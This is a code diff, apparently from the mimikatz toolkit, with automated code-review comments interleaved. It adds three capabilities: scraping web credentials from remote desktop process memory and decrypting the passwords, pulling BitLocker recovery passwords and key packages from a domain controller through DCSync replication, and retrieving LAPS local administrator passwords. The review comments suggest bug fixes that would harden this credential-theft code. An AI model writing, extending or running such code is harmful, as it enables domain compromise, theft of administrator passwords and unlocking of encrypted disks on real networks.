if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn, NULL))
|
||||
{
|
||||
*pMessage = NULL;
|
||||
dwErr = ldap_search_s(*ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, pMessage);
|
||||
|
@ -204,12 +204,15 @@ NTSTATUS kuhl_m_ts_logonpasswords(int argc, wchar_t * argv[])
|
||||
const BYTE MyPattern[] = {0x00, 0x00, 0x00, 0x00, 0xbb, 0x47, /*0x0b, 0x00*/};
|
||||
const BYTE MyPattern2[] = {0x00, 0x00, 0x00, 0x00, 0xf3, 0x47, /*0x0b, 0x00*/};
|
||||
const BYTE MyPattern3[] = {0x00, 0x00, 0x00, 0x00, 0x3b, 0x01};
|
||||
const BYTE MyWebPattern[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
|
||||
BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION pMemoryBasicInformation, PVOID pvArg)
|
||||
{
|
||||
KULL_M_MEMORY_ADDRESS aLocalBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aProcess = {pMemoryBasicInformation->BaseAddress, (PKULL_M_MEMORY_HANDLE) pvArg};
|
||||
PBYTE CurrentPtr, limite;
|
||||
PBYTE CurrentPtr, limite, ref;
|
||||
PWTS_KIWI pKiwiData;
|
||||
BOOL decStatus = TRUE, bIsCandidate;
|
||||
PWTS_WEB_KIWI pWebKiwiData;
|
||||
BOOL decStatus, bIsCandidate;
|
||||
DWORD dwOffset;
|
||||
|
||||
if((pMemoryBasicInformation->Type == MEM_PRIVATE) && (pMemoryBasicInformation->State != MEM_FREE) && (pMemoryBasicInformation->Protect == PAGE_READWRITE))
|
||||
{
|
||||
@ -218,7 +221,7 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalBuffer, &aProcess, pMemoryBasicInformation->RegionSize))
|
||||
{
|
||||
for(CurrentPtr = (PBYTE) aLocalBuffer.address, limite = (PBYTE) aLocalBuffer.address + pMemoryBasicInformation->RegionSize; CurrentPtr + sizeof(MyPattern) <= limite; CurrentPtr++)
|
||||
for(CurrentPtr = (PBYTE) aLocalBuffer.address, limite = (PBYTE) aLocalBuffer.address + pMemoryBasicInformation->RegionSize; CurrentPtr + sizeof(MyWebPattern) <= limite; CurrentPtr += sizeof(PVOID))
|
||||
{
|
||||
pKiwiData = (PWTS_KIWI) CurrentPtr;
|
||||
|
||||
@ -232,31 +235,91 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
|
||||
}
|
||||
else bIsCandidate = FALSE;
|
||||
|
||||
if(bIsCandidate && !pKiwiData->unk2)
|
||||
if(bIsCandidate)
|
||||
{
|
||||
//kprintf(L"-> %08x (%hu %hu %hu)\n", pKiwiData->unk1, pKiwiData->cbDomain, pKiwiData->cbUsername, pKiwiData->cbPassword);
|
||||
if(!(pKiwiData->cbDomain & 1) && (pKiwiData->cbDomain < sizeof(pKiwiData->Domain)))
|
||||
if(!pKiwiData->unk2)
|
||||
{
|
||||
if(!(pKiwiData->cbUsername & 1) && (pKiwiData->cbUsername > sizeof(wchar_t)) && (pKiwiData->cbUsername < sizeof(pKiwiData->UserName)))
|
||||
//kprintf(L"-> %08x (%hu %hu %hu)\n", pKiwiData->unk1, pKiwiData->cbDomain, pKiwiData->cbUsername, pKiwiData->cbPassword);
|
||||
if(!(pKiwiData->cbDomain & 1) && (pKiwiData->cbDomain < sizeof(pKiwiData->Domain)))
|
||||
{
|
||||
if(!(pKiwiData->cbPassword & 1) && (pKiwiData->cbPassword < sizeof(pKiwiData->Password)))
|
||||
if(!(pKiwiData->cbUsername & 1) && (pKiwiData->cbUsername > sizeof(wchar_t)) && (pKiwiData->cbUsername < sizeof(pKiwiData->UserName)))
|
||||
{
|
||||
kprintf(
|
||||
L"\n Domain : %.*s\n"
|
||||
L" UserName : %.*s\n",
|
||||
pKiwiData->cbDomain / sizeof(wchar_t), pKiwiData->Domain,
|
||||
pKiwiData->cbUsername/ sizeof(wchar_t), pKiwiData->UserName
|
||||
);
|
||||
|
||||
if(pKiwiData->cbPassword && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10))
|
||||
if(!(pKiwiData->cbPassword & 1) && (pKiwiData->cbPassword < sizeof(pKiwiData->Password)))
|
||||
{
|
||||
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pKiwiData->Password, sizeof(pKiwiData->Password), CRYPTPROTECTMEMORY_SAME_PROCESS);
|
||||
}
|
||||
kprintf(
|
||||
L"\n Domain : %.*s\n"
|
||||
L" UserName : %.*s\n",
|
||||
pKiwiData->cbDomain / sizeof(wchar_t), pKiwiData->Domain,
|
||||
pKiwiData->cbUsername / sizeof(wchar_t), pKiwiData->UserName
|
||||
);
|
||||
|
||||
if(pKiwiData->cbPassword && (MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_10))
|
||||
{
|
||||
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pKiwiData->Password, sizeof(pKiwiData->Password), CRYPTPROTECTMEMORY_SAME_PROCESS);
|
||||
}
|
||||
else decStatus = TRUE;
|
||||
|
||||
if(decStatus)
|
||||
{
|
||||
kprintf(L" Password/Pin: %.*s\n", pKiwiData->cbPassword / sizeof(wchar_t), pKiwiData->Password);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
else if(RtlEqualMemory(MyWebPattern, CurrentPtr, sizeof(MyWebPattern)))
|
||||
{
|
||||
pWebKiwiData = (PWTS_WEB_KIWI) CurrentPtr;
|
||||
if(
|
||||
(pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000))
|
||||
&&
|
||||
(pWebKiwiData->Username.Length && !(pWebKiwiData->Username.Length % sizeof(wchar_t)) && (pWebKiwiData->Username.Length < ((WTS_USERNAME_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Username.Length == pWebKiwiData->Username.MaximumLength) || (pWebKiwiData->Username.Length == (pWebKiwiData->Username.MaximumLength - sizeof(wchar_t)))))
|
||||
)
|
||||
{
|
||||
if(
|
||||
(pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000))
|
||||
&&
|
||||
(pWebKiwiData->Password.Length && !(pWebKiwiData->Password.Length % sizeof(wchar_t)) && (pWebKiwiData->Password.Length < ((WTS_PASSWORD_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Password.Length == pWebKiwiData->Password.MaximumLength) || (pWebKiwiData->Password.Length == (pWebKiwiData->Password.MaximumLength - sizeof(wchar_t)))))
|
||||
)
|
||||
{
|
||||
// Domain is not mandatory here
|
||||
kprintf(L"\n * Web Credentials? *\n");
|
||||
ref = (PBYTE) aProcess.address + (CurrentPtr - (PBYTE) aLocalBuffer.address);
|
||||
|
||||
if(
|
||||
(pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000))
|
||||
&&
|
||||
(pWebKiwiData->Domain.Length && !(pWebKiwiData->Domain.Length % sizeof(wchar_t)) && (pWebKiwiData->Domain.Length < ((WTS_DOMAIN_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Domain.Length == pWebKiwiData->Domain.MaximumLength) || (pWebKiwiData->Domain.Length == (pWebKiwiData->Domain.MaximumLength - sizeof(wchar_t)))))
|
||||
)
|
||||
{
|
||||
pWebKiwiData->Domain.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Domain.Buffer);
|
||||
if(kull_m_process_getUnicodeString(&pWebKiwiData->Domain, aProcess.hMemory))
|
||||
{
|
||||
kprintf(L" Domain : %wZ\n", &pWebKiwiData->Domain);
|
||||
LocalFree(pWebKiwiData->Domain.Buffer);
|
||||
}
|
||||
}
|
||||
|
||||
pWebKiwiData->Username.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Username.Buffer);
|
||||
if(kull_m_process_getUnicodeString(&pWebKiwiData->Username, aProcess.hMemory))
|
||||
{
|
||||
kprintf(L" UserName : %wZ\n", &pWebKiwiData->Username);
|
||||
LocalFree(pWebKiwiData->Username.Buffer);
|
||||
}
|
||||
|
||||
pWebKiwiData->Password.Buffer = (PWSTR) (ref + (ULONG_PTR) pWebKiwiData->Password.Buffer);
|
||||
if(kull_m_process_getUnicodeString(&pWebKiwiData->Password, aProcess.hMemory))
|
||||
{
|
||||
decStatus = kull_m_crypto_remote_CryptUnprotectMemory(aProcess.hMemory, pWebKiwiData->Password.Buffer, pWebKiwiData->Password.Length, CRYPTPROTECTMEMORY_SAME_PROCESS);
|
||||
if(decStatus)
|
||||
{
|
||||
kprintf(L" Password/Pin: %.*s\n", pKiwiData->cbPassword / sizeof(wchar_t), pKiwiData->Password);
|
||||
dwOffset = (lstrlen(pWebKiwiData->Password.Buffer) + 1) * sizeof(wchar_t);
|
||||
kprintf(L" Password/Pin: %s\n ", pWebKiwiData->Password.Buffer);
|
||||
}
|
||||
else kuhl_m_sekurlsa_trymarshal(&pWebKiwiData->Password);
|
||||
|
||||
LocalFree(pWebKiwiData->Password.Buffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
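Review bot: The rewritten scan loop in kuhl_m_ts_logonpasswords_MemoryAnalysis only guarantees that `sizeof(MyWebPattern)` bytes remain (`CurrentPtr + sizeof(MyWebPattern) <= limite`), yet the body casts `CurrentPtr` to `PWTS_KIWI` and `PWTS_WEB_KIWI` and reads fields well beyond those eight bytes. A candidate near the end of the copied region therefore makes the function read past its own local buffer. A size check ahead of each cast, for example `if((CurrentPtr + sizeof(WTS_WEB_KIWI)) <= limite)` around the web branch and the equivalent with `sizeof(WTS_KIWI)` for the first branch, would keep every field access inside the copy. The function ends outside the visible hunks, so the buffer's release path could not be checked here.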
@ -10,6 +10,7 @@
|
||||
#include "../../modules/kull_m_process.h"
|
||||
#include "../../modules/kull_m_memory.h"
|
||||
#include "../../modules/kull_m_crypto_remote.h"
|
||||
#include "sekurlsa/kuhl_m_sekurlsa.h"
|
||||
|
||||
const KUHL_M kuhl_m_ts;
|
||||
|
||||
@ -228,6 +229,14 @@ typedef struct _WTS_KIWI {
|
||||
} WTS_KIWI, *PWTS_KIWI;
|
||||
#pragma pack(pop)
|
||||
|
||||
typedef struct _WTS_WEB_KIWI {
|
||||
DWORD dwVersion;
|
||||
UNICODE_STRING Domain;
|
||||
UNICODE_STRING Username;
|
||||
UNICODE_STRING Password;
|
||||
//BYTE Data[ANYSIZE_ARRAY];
|
||||
} WTS_WEB_KIWI, *PWTS_WEB_KIWI;
|
||||
|
||||
typedef struct _TS_PROPERTY_KIWI {
|
||||
PCWSTR szProperty;
|
||||
DWORD dwType;
|
||||
|
@ -16,6 +16,7 @@ LPCSTR kuhl_m_lsadump_dcsync_oids[] = {
|
||||
szOID_ANSI_userAccountControl, szOID_ANSI_accountExpires, szOID_ANSI_pwdLastSet,
|
||||
szOID_ANSI_objectSid, szOID_ANSI_sIDHistory,
|
||||
szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
|
||||
szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
|
||||
szOID_ANSI_trustPartner, szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
|
||||
szOID_ANSI_currentValue,
|
||||
szOID_isDeleted,
|
||||
@ -25,6 +26,8 @@ LPCSTR kuhl_m_lsadump_dcsync_oids_export[] = {
|
||||
szOID_ANSI_sAMAccountName, szOID_ANSI_objectSid,
|
||||
szOID_ANSI_userAccountControl,
|
||||
szOID_ANSI_unicodePwd,
|
||||
szOID_ANSI_msFVEKeyPackage, szOID_ANSI_msFVERecoveryGuid, szOID_ANSI_msFVEVolumeGuid, szOID_ANSI_msFVERecoveryPassword,
|
||||
szOID_ANSI_currentValue,
|
||||
szOID_isDeleted,
|
||||
};
|
||||
NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
@ -35,7 +38,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
DRS_HANDLE hDrs = NULL;
|
||||
DSNAME dsName = {0};
|
||||
DRS_MSG_GETCHGREQ getChReq = {0};
|
||||
DWORD dwOutVersion = 0, i, AuthnSvc;
|
||||
DWORD dwOutVersion = 0, i, AuthnSvc, suppAtt = 0;
|
||||
DRS_MSG_GETCHGREPLY getChRep;
|
||||
ULONG drsStatus;
|
||||
LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL, szService;
|
||||
@ -43,6 +46,9 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
DRS_EXTENSIONS_INT DrsExtensionsInt;
|
||||
BOOL someExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL), allData = kull_m_string_args_byName(argc, argv, L"all", NULL, NULL), csvOutput = kull_m_string_args_byName(argc, argv, L"csv", NULL, NULL), withDeleted = kull_m_string_args_byName(argc, argv, L"deleted", NULL, NULL), decodeUAC = kull_m_string_args_byName(argc, argv, L"uac", NULL, NULL), bAuthNtlm = kull_m_string_args_byName(argc, argv, L"authntlm", NULL, NULL);
|
||||
SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
|
||||
PWCHAR dn;
|
||||
PLDAP ld;
|
||||
ATTRTYP SuppATT_IntId[2] = {0, 0}; // [0] msMcsAdmPwd, [1] msMcsAdmPwdExpirationTime
|
||||
|
||||
if(!kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
|
||||
if(kull_m_net_getCurrentDomainInfo(&pPolicyDnsDomainInfo))
|
||||
@ -68,6 +74,27 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
kprintf(L"[DC] \'%s\' will be the user account\n", szUser);
|
||||
|
||||
kull_m_rpc_getArgs(argc, argv, NULL, NULL, NULL, &szService, L"ldap", &AuthnSvc, ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), NULL, &secIdentity, NULL, TRUE);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"laps", NULL, NULL))
|
||||
{
|
||||
if(kull_m_ldap_getLdapAndRootDN(szDc, L"schemaNamingContext", &ld, &dn, secIdentity.UserLength ? &secIdentity : NULL))
|
||||
{
|
||||
if(
|
||||
kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwd) L"))", SuppATT_IntId + 0)
|
||||
&&
|
||||
kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwdExpirationTime) L"))", SuppATT_IntId + 1)
|
||||
)
|
||||
{
|
||||
if(SuppATT_IntId[0] && SuppATT_IntId[1])
|
||||
{
|
||||
suppAtt = 2;
|
||||
}
|
||||
}
|
||||
LocalFree(dn);
|
||||
ldap_unbind(ld);
|
||||
}
|
||||
}
|
||||
|
||||
if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szDc, NULL, szService, TRUE, bAuthNtlm ? RPC_C_AUTHN_WINNT : ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hBinding, kull_m_rpc_drsr_RpcSecurityCallback))
|
||||
{
|
||||
if(kull_m_rpc_drsr_getDomainAndUserInfos(&hBinding, szDc, szDomain, &getChReq.V8.uuidDsaObjDest, szUser, szGuid, &dsName.Guid, &DrsExtensionsInt))
|
||||
@ -82,10 +109,11 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
getChReq.V8.cMaxBytes = 0x00a00000; // 10M
|
||||
getChReq.V8.ulExtendedOp = (allData ? 0 : EXOP_REPL_OBJ);
|
||||
|
||||
if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * ((allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
|
||||
if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * (suppAtt + (allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
|
||||
{
|
||||
getChReq.V8.pPartialAttrSet->dwVersion = 1;
|
||||
getChReq.V8.pPartialAttrSet->dwReserved1 = 0;
|
||||
|
||||
if(allData)
|
||||
{
|
||||
getChReq.V8.pPartialAttrSet->cAttrs = ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export);
|
||||
@ -98,6 +126,13 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
for(i = 0; i < getChReq.V8.pPartialAttrSet->cAttrs; i++)
|
||||
kull_m_rpc_drsr_MakeAttid(&getChReq.V8.PrefixTableDest, kuhl_m_lsadump_dcsync_oids[i], &getChReq.V8.pPartialAttrSet->rgPartialAttr[i], TRUE);
|
||||
}
|
||||
|
||||
if(suppAtt)
|
||||
{
|
||||
getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[0];
|
||||
getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[1];
|
||||
}
|
||||
|
||||
RpcTryExcept
|
||||
{
|
||||
do
|
||||
@ -116,7 +151,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
if(csvOutput)
|
||||
kuhl_m_lsadump_dcsync_descrObject_csv(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, withDeleted, decodeUAC);
|
||||
else
|
||||
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport);
|
||||
kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport, SuppATT_IntId, ARRAYSIZE(SuppATT_IntId));
|
||||
pObject = pObject->pNextEntInf;
|
||||
}
|
||||
}
|
||||
@ -166,6 +201,51 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
PWCHAR myAttrs[] = {L"msDS-IntId", NULL};
|
||||
DWORD ret;
|
||||
PLDAPMessage pMessage = NULL, pEntry;
|
||||
PBERVAL *pId;
|
||||
PSTR tmpString;
|
||||
|
||||
ret = ldap_search_s(ld, dn, LDAP_SCOPE_ONELEVEL, req, myAttrs, FALSE, &pMessage);
|
||||
if(ret == LDAP_SUCCESS)
|
||||
{
|
||||
if(ldap_count_entries(ld, pMessage) == 1)
|
||||
{
|
||||
if(pEntry = ldap_first_entry(ld, pMessage))
|
||||
{
|
||||
kprintf(L"[ldap] %s : ", ldap_get_dn(ld, pEntry));
|
||||
pId = ldap_get_values_len(ld, pEntry, myAttrs[0]);
|
||||
if(pId && pId[0])
|
||||
{
|
||||
if(tmpString = (PSTR) LocalAlloc(LPTR, pId[0]->bv_len + 1))
|
||||
{
|
||||
RtlCopyMemory(tmpString, pId[0]->bv_val, pId[0]->bv_len);
|
||||
*pIntId = strtol(tmpString, NULL, 10);
|
||||
kprintf(L"0x%08x\n", *pIntId);
|
||||
status = TRUE;
|
||||
|
||||
LocalFree(tmpString);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"No values?\n");
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"More than one entry?\n");
|
||||
}
|
||||
else PRINT_ERROR(L"ldap_search_s 0x%x (%u)\n", ret, ret);
|
||||
|
||||
if(pMessage)
|
||||
{
|
||||
ldap_msgfree(pMessage);
|
||||
}
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory)
|
||||
{
|
||||
DWORD i;
|
||||
@ -233,12 +313,15 @@ void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATT
|
||||
}
|
||||
}
|
||||
|
||||
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport)
|
||||
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
|
||||
{
|
||||
kull_m_rpc_drsr_findPrintMonoAttr(L"\nObject RDN : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
|
||||
|
||||
kprintf(L"\n");
|
||||
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
|
||||
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes);
|
||||
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes, pSuppATT_IntId, cSuppATT_IntId);
|
||||
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, NULL, NULL))
|
||||
kuhl_m_lsadump_dcsync_descrBitlocker(prefixTable, attributes, someExport);
|
||||
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, NULL, NULL))
|
||||
kuhl_m_lsadump_dcsync_descrTrust(prefixTable, attributes, szSrcDomain);
|
||||
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_currentValue, NULL, NULL))
|
||||
@ -292,7 +375,88 @@ LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
|
||||
return target;
|
||||
}
|
||||
|
||||
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes)
|
||||
void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport)
|
||||
{
|
||||
UNICODE_STRING uString = {0};
|
||||
DWORD szData = 0;
|
||||
PVOID data = 0;
|
||||
GUID RecoveryGuid;
|
||||
PWCHAR filename;
|
||||
|
||||
kprintf(L"** BITLOCKER RECOVERY INFORMATION **\n\n");
|
||||
|
||||
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEVolumeGuid, &data, NULL))
|
||||
{
|
||||
kprintf(L"Volume GUID : ");
|
||||
kull_m_string_displayGUID((LPCGUID) data);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
|
||||
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, &RecoveryGuid, NULL))
|
||||
{
|
||||
kprintf(L"Recovery GUID : ");
|
||||
kull_m_string_displayGUID(&RecoveryGuid);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
else
|
||||
{
|
||||
UuidCreate(&RecoveryGuid);
|
||||
if(someExport)
|
||||
{
|
||||
kprintf(L"Recovery GUID (fake) : ");
|
||||
kull_m_string_displayGUID(&RecoveryGuid);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
|
||||
if(someExport)
|
||||
{
|
||||
RtlStringFromGUID(&RecoveryGuid, &uString);
|
||||
}
|
||||
|
||||
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryPassword, &data, &szData))
|
||||
{
|
||||
if(szData > 0)
|
||||
{
|
||||
kprintf(L"Recovery Password : %s\n", data);
|
||||
|
||||
if(someExport)
|
||||
{
|
||||
if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"recoveryPassword"))
|
||||
{
|
||||
kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
|
||||
LocalFree(filename);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEKeyPackage, &data, &szData))
|
||||
{
|
||||
if(szData > 0)
|
||||
{
|
||||
kprintf(L"Key Package Size : %u byte(s)\nKey Package : [", szData);
|
||||
kull_m_string_wprintf_hex(data, szData, 0);
|
||||
kprintf(L"]\n");
|
||||
|
||||
if (someExport)
|
||||
{
|
||||
if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"keyPackage"))
|
||||
{
|
||||
kprintf(L"\tExport : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
|
||||
LocalFree(filename);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (uString.Buffer)
|
||||
{
|
||||
RtlFreeUnicodeString(&uString);
|
||||
}
|
||||
}
|
||||
|
||||
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
|
||||
{
|
||||
DWORD rid = 0, i;
|
||||
PBYTE encodedData;
|
||||
@ -365,6 +529,21 @@ void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK
|
||||
kprintf(L"\nSupplemental Credentials:\n");
|
||||
kuhl_m_lsadump_dcsync_descrUserProperties((PUSER_PROPERTIES) encodedData);
|
||||
}
|
||||
|
||||
if((cSuppATT_IntId >= 2) && pSuppATT_IntId[0] && pSuppATT_IntId[1])
|
||||
{
|
||||
kprintf(L"LAPS:\n");
|
||||
if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[0], &encodedData, &encodedDataSize))
|
||||
{
|
||||
kprintf(L" Password : %.*S\n", encodedDataSize, encodedData);
|
||||
}
|
||||
if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[1], &data, NULL))
|
||||
{
|
||||
kprintf(L" Last change: ");
|
||||
kull_m_string_displayLocalFileTime((LPFILETIME) data);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
DECLARE_CONST_UNICODE_STRING(PrimaryCleartext, L"Primary:CLEARTEXT");
|
||||
@ -2096,7 +2275,6 @@ BOOL kuhl_m_lsadump_dcshadow_build_replication(PDCSHADOW_DOMAIN_INFO info)
|
||||
kprintf(L" uidOriginatingDsa:");
|
||||
kull_m_string_displayGUID(&attr->MetaData.uidOriginatingDsa);
|
||||
kprintf(L"\n");
|
||||
|
||||
}
|
||||
kprintf(L"\n");
|
||||
}
|
||||
@ -3046,4 +3224,4 @@ ULONG SRV_IDL_DRSVerifyNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_VERIFYR
|
||||
ULONG SRV_IDL_DRSUpdateRefs(DRS_HANDLE hDrs, DWORD dwVersion, DRS_MSG_UPDREFS *pmsgUpdRefs)
|
||||
{
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
}
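Review bot: The new `kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId` never releases two LDAP allocations: the string returned by `ldap_get_dn(ld, pEntry)` is handed straight to `kprintf`, and `pId` from `ldap_get_values_len` is not freed on any path. Keep the DN in a local, check it for NULL before printing, and call `ldap_memfree(dnStr);` afterwards; add `ldap_value_free_len(pId);` once the value has been copied into `tmpString`. `strtol(tmpString, NULL, 10)` also sets `status = TRUE` whether or not any digits were parsed, so passing an end pointer and testing it would make a malformed `msDS-IntId` an explicit failure rather than leaving it to the caller's non-zero check. Finally, the `else PRINT_ERROR(L"More than one entry?\n")` branch also fires when the search returns zero entries, so the message should cover both cases.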
|
||||
|
@ -12,6 +12,8 @@
|
||||
#include "../modules/rpc/kull_m_rpc_drsr.h"
|
||||
#include "../kuhl_m.h"
|
||||
